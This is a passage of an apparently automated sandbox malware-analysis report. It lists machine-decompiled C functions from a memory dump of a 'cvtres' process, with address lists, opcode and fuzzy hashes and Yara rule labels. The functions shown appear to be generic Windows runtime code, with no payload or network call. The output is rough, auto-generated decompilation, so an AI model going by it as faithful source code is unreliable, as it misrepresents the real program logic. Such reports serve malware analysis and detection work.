							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x56986c0; // 0x50707b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x56986b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x56986bc;
										_t72 = 0x56986b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E055A9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x56986c4;
									_t72 = 0x56986c0;
									L18:
									E055D9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                                        0x055a9100
                                                                        0x055a9100
                                                                        0x055a9100
                                                                        0x055a9100
                                                                        0x055a9102
                                                                        0x055a9107
                                                                        0x055a910c
                                                                        0x055a9110
                                                                        0x055a9115
                                                                        0x055a9136
                                                                        0x055a9143
                                                                        0x056037e4
                                                                        0x056037e4
                                                                        0x055a9149
                                                                        0x055a914e
                                                                        0x055a914e
                                                                        0x055a9117
                                                                        0x055a911d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055a911f
                                                                        0x055a9125
                                                                        0x00000000
                                                                        0x055a9151
                                                                        0x055a9158
                                                                        0x055a915d
                                                                        0x055a9161
                                                                        0x055a9168
                                                                        0x05603715
                                                                        0x00000000
                                                                        0x055a916e
                                                                        0x055a916e
                                                                        0x055a9175
                                                                        0x055a9177
                                                                        0x055a917e
                                                                        0x055a917f
                                                                        0x055a9182
                                                                        0x055a9182
                                                                        0x055a9187
                                                                        0x055a9187
                                                                        0x055a918a
                                                                        0x055a918d
                                                                        0x055a918f
                                                                        0x055a9192
                                                                        0x055a9195
                                                                        0x055a9198
                                                                        0x055a9198
                                                                        0x055a9198
                                                                        0x055a919a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0560371f
                                                                        0x05603721
                                                                        0x05603727
                                                                        0x0560372f
                                                                        0x05603733
                                                                        0x05603735
                                                                        0x05603738
                                                                        0x0560373b
                                                                        0x0560373d
                                                                        0x05603740
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05603746
                                                                        0x05603749
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0560374f
                                                                        0x05603751
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05603757
                                                                        0x05603759
                                                                        0x0560375c
                                                                        0x0560375c
                                                                        0x0560375e
                                                                        0x0560375e
                                                                        0x05603761
                                                                        0x05603764
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05603766
                                                                        0x05603768
                                                                        0x056037a3
                                                                        0x056037a3
                                                                        0x056037a5
                                                                        0x056037a7
                                                                        0x056037ad
                                                                        0x056037b0
                                                                        0x056037b2
                                                                        0x056037bc
                                                                        0x056037c2
                                                                        0x056037c2
                                                                        0x056037b2
                                                                        0x055a9187
                                                                        0x055a9187
                                                                        0x055a918a
                                                                        0x055a918d
                                                                        0x055a918f
                                                                        0x055a9192
                                                                        0x055a9195
                                                                        0x00000000
                                                                        0x055a9195
                                                                        0x00000000
                                                                        0x055a9187
                                                                        0x0560376a
                                                                        0x0560376a
                                                                        0x0560376c
                                                                        0x0560376c
                                                                        0x0560376f
                                                                        0x05603775
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05603777
                                                                        0x05603779
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05603782
                                                                        0x05603787
                                                                        0x05603789
                                                                        0x05603790
                                                                        0x05603790
                                                                        0x0560378b
                                                                        0x0560378b
                                                                        0x0560378b
                                                                        0x05603792
                                                                        0x05603795
                                                                        0x05603795
                                                                        0x05603798
                                                                        0x05603798
                                                                        0x0560379b
                                                                        0x0560379b
                                                                        0x055a91a3
                                                                        0x055a91a9
                                                                        0x055a91b0
                                                                        0x055a91b4
                                                                        0x055a91b4
                                                                        0x055a91bb
                                                                        0x055a91c0
                                                                        0x055a91c5
                                                                        0x055a91c7
                                                                        0x056037da
                                                                        0x055a91cd
                                                                        0x055a91cd
                                                                        0x055a91cd
                                                                        0x055a91d2
                                                                        0x055a91d5
                                                                        0x055a9239
                                                                        0x055a9239
                                                                        0x055a91d7
                                                                        0x055a91db
                                                                        0x055a91e1
                                                                        0x055a91e7
                                                                        0x055a91fd
                                                                        0x055a9203
                                                                        0x055a921e
                                                                        0x055a9223
                                                                        0x00000000
                                                                        0x055a9223
                                                                        0x055a9205
                                                                        0x055a9208
                                                                        0x055a920c
                                                                        0x055a9214
                                                                        0x055a9214
                                                                        0x055a91e9
                                                                        0x055a91e9
                                                                        0x055a91ee
                                                                        0x055a91f3
                                                                        0x055a91f3
                                                                        0x055a91f3
                                                                        0x055a91e7
                                                                        0x00000000
                                                                        0x055a91db
                                                                        0x055a9187
                                                                        0x055a9168

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d960a17f4efc19b031f295a7e38929eae778c7951a35f9e5e0a9cb74147face9
                                                                        • Instruction ID: e6f81fea5b2a6bd49d03c2fdfdebb337b074cdba9a575dad5e339c090a1a93f7
                                                                        • Opcode Fuzzy Hash: d960a17f4efc19b031f295a7e38929eae778c7951a35f9e5e0a9cb74147face9
                                                                        • Instruction Fuzzy Hash: 7331C2B6B05295DFDB25DFA8C48CBADBBF2BB89310F188549D4056B381D734A980CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055C0050 Relevance: .1, Instructions: 81COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 53%
                                                                        			E055C0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x569d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E055D9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E055EB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E05678A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E055D9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x569b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                                        0x055c0055
                                                                        0x055c005d
                                                                        0x055c0062
                                                                        0x055c006c
                                                                        0x055c006f
                                                                        0x055c0074
                                                                        0x055c007a
                                                                        0x055c007a
                                                                        0x055c0080
                                                                        0x055c0080
                                                                        0x055c0087
                                                                        0x055c008d
                                                                        0x055c008f
                                                                        0x055c0093
                                                                        0x055c0095
                                                                        0x055c009b
                                                                        0x055c00f8
                                                                        0x055c00fb
                                                                        0x055c00fc
                                                                        0x055c00ff
                                                                        0x055c0108
                                                                        0x055c0108
                                                                        0x055c00a2
                                                                        0x055c00a6
                                                                        0x055c00b3
                                                                        0x055c00bc
                                                                        0x055c00c5
                                                                        0x055c00ca
                                                                        0x0560c01e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0560c02d
                                                                        0x055c00d5
                                                                        0x055c00d9
                                                                        0x0560c03d
                                                                        0x0560c046
                                                                        0x0560c046
                                                                        0x055c00df
                                                                        0x055c00e2
                                                                        0x055c00ea
                                                                        0x055c00ef
                                                                        0x055c00f2
                                                                        0x055c00f6
                                                                        0x055c0111
                                                                        0x055c0117
                                                                        0x055c0117
                                                                        0x00000000
                                                                        0x055c00f6
                                                                        0x055c00d0
                                                                        0x055c00d0
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: adcc75fcc508e4f98d23c400c56e8d26da808d103ded66c8b92eba57e4f02452
                                                                        • Instruction ID: fdb9acfd758625f42326e0998be9d54a6a48f070cd0756ec674f6b874805e75a
                                                                        • Opcode Fuzzy Hash: adcc75fcc508e4f98d23c400c56e8d26da808d103ded66c8b92eba57e4f02452
                                                                        • Instruction Fuzzy Hash: 76317C35201B04CFD725CF28C848B6AB7E6FB89714F1545ADE49697BA0EA35AC01CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05626C0A Relevance: .1, Instructions: 79COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 77%
                                                                        			E05626C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E055C7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x5697b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L055C4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E055EF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E055C7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E055E9AE0();
						_t23 = L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                                        0x05626c0a
                                                                        0x05626c0f
                                                                        0x05626c10
                                                                        0x05626c13
                                                                        0x05626c15
                                                                        0x05626c19
                                                                        0x05626c1c
                                                                        0x05626c21
                                                                        0x05626c28
                                                                        0x05626c3a
                                                                        0x05626c2a
                                                                        0x05626c33
                                                                        0x05626c33
                                                                        0x05626c3f
                                                                        0x05626c48
                                                                        0x05626c4d
                                                                        0x05626c60
                                                                        0x05626c65
                                                                        0x05626c69
                                                                        0x05626c73
                                                                        0x05626c79
                                                                        0x05626c7f
                                                                        0x05626c86
                                                                        0x05626c90
                                                                        0x05626c94
                                                                        0x05626ca6
                                                                        0x05626cb2
                                                                        0x05626cbd
                                                                        0x05626cbd
                                                                        0x05626cc3
                                                                        0x05626cc7
                                                                        0x05626ccb
                                                                        0x05626cd0
                                                                        0x05626cd1
                                                                        0x05626ce2
                                                                        0x05626ce2
                                                                        0x05626c69
                                                                        0x05626ced

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c94793ddcb43d67280ba4fd3cd89a6c3548399a94d4104aabc2b3a4c78b2f7ac
                                                                        • Instruction ID: ce200e1c98cb302b06fb8709f54bc1485e8868bba5a46f01718c1a65de3b49a3
                                                                        • Opcode Fuzzy Hash: c94793ddcb43d67280ba4fd3cd89a6c3548399a94d4104aabc2b3a4c78b2f7ac
                                                                        • Instruction Fuzzy Hash: 6F21D1B1600A55AFC715DF68D844F6AB7B8FF48700F0400A9F909C7B91DA34ED50CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E90AF Relevance: .1, Instructions: 76COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E055E90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E055FD4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E055DE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L055C4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E055EF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E055DA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                                        0x055e90af
                                                                        0x055e90b8
                                                                        0x055e90bb
                                                                        0x055e90bf
                                                                        0x055e90c2
                                                                        0x055e90c2
                                                                        0x055e90c8
                                                                        0x055e90cb
                                                                        0x055e90cd
                                                                        0x056214d7
                                                                        0x056214eb
                                                                        0x056214eb
                                                                        0x00000000
                                                                        0x056214eb
                                                                        0x056214db
                                                                        0x056214e6
                                                                        0x00000000
                                                                        0x056214f2
                                                                        0x056214e8
                                                                        0x00000000
                                                                        0x056214e8
                                                                        0x055e90d8
                                                                        0x055e90da
                                                                        0x055e90dd
                                                                        0x055e90e5
                                                                        0x00000000
                                                                        0x055e9139
                                                                        0x055e90fa
                                                                        0x055e90fe
                                                                        0x055e9142
                                                                        0x00000000
                                                                        0x055e9142
                                                                        0x055e9104
                                                                        0x055e9107
                                                                        0x055e910b
                                                                        0x055e9110
                                                                        0x055e9118
                                                                        0x055e9147
                                                                        0x055e9148
                                                                        0x055e914f
                                                                        0x055e9150
                                                                        0x055e9151
                                                                        0x055e9152
                                                                        0x055e9156
                                                                        0x055e915d
                                                                        0x055e9160
                                                                        0x055e9168
                                                                        0x055e916c
                                                                        0x055e91bc
                                                                        0x055e91be
                                                                        0x00000000
                                                                        0x055e91be
                                                                        0x055e916e
                                                                        0x055e9173
                                                                        0x055e9176
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055e917c
                                                                        0x055e9180
                                                                        0x055e91b5
                                                                        0x00000000
                                                                        0x055e91b5
                                                                        0x055e9182
                                                                        0x055e9185
                                                                        0x055e9189
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055e918e
                                                                        0x055e9190
                                                                        0x055e9198
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055e91a0
                                                                        0x00000000
                                                                        0x055e91ad
                                                                        0x055e91ad
                                                                        0x055e91b0
                                                                        0x055e91b1
                                                                        0x00000000
                                                                        0x055e9185
                                                                        0x055e911a
                                                                        0x055e911c
                                                                        0x055e911f
                                                                        0x055e9125
                                                                        0x055e9127
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                        • Instruction ID: afc522db30a32f6dd6b0438ba05ab6c8834ed36ffe45f14f5608a478dee82135
                                                                        • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                        • Instruction Fuzzy Hash: 08215EB1A00715EFDB25DF59C844EAAFBF9FB44750F15886AE949AB210D370ED40CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D3B7A Relevance: .1, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 59%
                                                                        			E055D3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x56984c4; // 0x0
				_v12 = 1;
				_v8 =  *0x56984c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L055C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x56984c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E055EAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E055EFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x56984c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x56984c4; // 0x0
					L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                                        0x055d3b89
                                                                        0x055d3b96
                                                                        0x055d3ba1
                                                                        0x055d3bab
                                                                        0x055d3bb5
                                                                        0x055d3bb9
                                                                        0x05616298
                                                                        0x055d3bbf
                                                                        0x055d3bc2
                                                                        0x055d3bc3
                                                                        0x055d3bc9
                                                                        0x055d3bca
                                                                        0x055d3bcc
                                                                        0x055d3bcd
                                                                        0x055d3bd4
                                                                        0x055d3bd6
                                                                        0x055d3bdb
                                                                        0x055d3bea
                                                                        0x055d3bf7
                                                                        0x055d3bfb
                                                                        0x055d3bff
                                                                        0x055d3c09
                                                                        0x055d3c0a
                                                                        0x055d3c0b
                                                                        0x055d3c0f
                                                                        0x055d3c14
                                                                        0x055d3c18
                                                                        0x055d3c18
                                                                        0x055d3bfb
                                                                        0x055d3c1b
                                                                        0x055d3c30
                                                                        0x055d3c30
                                                                        0x055d3c3d

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 96c01d4a2163e8d7eb95d7fc0ac122f1692047dac225eca75c9731ca7aabfe67
                                                                        • Instruction ID: 2f36926d2635a59b340ceb7a680bc9f1af7d2b705cc92f20728e35d9b9d59b75
                                                                        • Opcode Fuzzy Hash: 96c01d4a2163e8d7eb95d7fc0ac122f1692047dac225eca75c9731ca7aabfe67
                                                                        • Instruction Fuzzy Hash: 132183B2600109AFCB14DF58CD85F5ABBBDFF44708F250568E5099B651D771AD05CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05626CF0 Relevance: .1, Instructions: 74COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 80%
                                                                        			E05626CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E055C7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E055C7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x5585c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E055DF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E055DF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E05627016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L055C2400( &_v52);
								}
								_t21 = L055C2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                                        0x05626cfb
                                                                        0x05626d00
                                                                        0x05626d02
                                                                        0x05626d06
                                                                        0x05626d0a
                                                                        0x05626d0e
                                                                        0x05626d19
                                                                        0x05626d2b
                                                                        0x05626d1b
                                                                        0x05626d24
                                                                        0x05626d24
                                                                        0x05626d33
                                                                        0x05626d39
                                                                        0x05626d46
                                                                        0x05626d4f
                                                                        0x05626d61
                                                                        0x05626d51
                                                                        0x05626d5a
                                                                        0x05626d5a
                                                                        0x05626d69
                                                                        0x05626d6b
                                                                        0x05626d6d
                                                                        0x05626d6f
                                                                        0x05626d6f
                                                                        0x05626d74
                                                                        0x05626d79
                                                                        0x05626d7a
                                                                        0x05626d7f
                                                                        0x05626d82
                                                                        0x05626d88
                                                                        0x05626d89
                                                                        0x05626d90
                                                                        0x05626d94
                                                                        0x05626da7
                                                                        0x05626db1
                                                                        0x05626db1
                                                                        0x05626dbb
                                                                        0x05626dbb
                                                                        0x05626d90
                                                                        0x05626d69
                                                                        0x05626d46
                                                                        0x05626dc6

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 98d538877210ae0014a06a885a55523cb41a4db5f5584ae77d501e548285f89d
                                                                        • Instruction ID: 959cd09f85e82c56071cbe88973a398a6fe53c5f64a7dbb32ffa0659f009ccc4
                                                                        • Opcode Fuzzy Hash: 98d538877210ae0014a06a885a55523cb41a4db5f5584ae77d501e548285f89d
                                                                        • Instruction Fuzzy Hash: 3E21D372504AA99FC311DF68C948B6BBBECFFC1740F04085AB94187691EB34D509CBA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0567070D Relevance: .1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 67%
                                                                        			E0567070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E056707DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0566AFDE( &_v8,  &_v12);
					E05671293(_t38, _v28, _t60);
					if(E055C7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E056614FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                                        0x0567071b
                                                                        0x05670724
                                                                        0x05670734
                                                                        0x05670738
                                                                        0x0567074b
                                                                        0x0567074b
                                                                        0x05670753
                                                                        0x05670753
                                                                        0x05670759
                                                                        0x0567075d
                                                                        0x05670774
                                                                        0x05670779
                                                                        0x0567077d
                                                                        0x05670789
                                                                        0x05670795
                                                                        0x056707a7
                                                                        0x05670797
                                                                        0x056707a0
                                                                        0x056707a0
                                                                        0x056707af
                                                                        0x056707c4
                                                                        0x056707cd
                                                                        0x056707cd
                                                                        0x056707af
                                                                        0x056707dc

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                        • Instruction ID: 92576e2bd67b0c5eca1142bbfc7d652e949b3c40a38d797925e28d3075dad461
                                                                        • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                        • Instruction Fuzzy Hash: F92146363082049FC705DF18C888B6ABBA5FFC4320F1486ADF8959B781C730D809CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05627794 Relevance: .1, Instructions: 70COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E05627794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
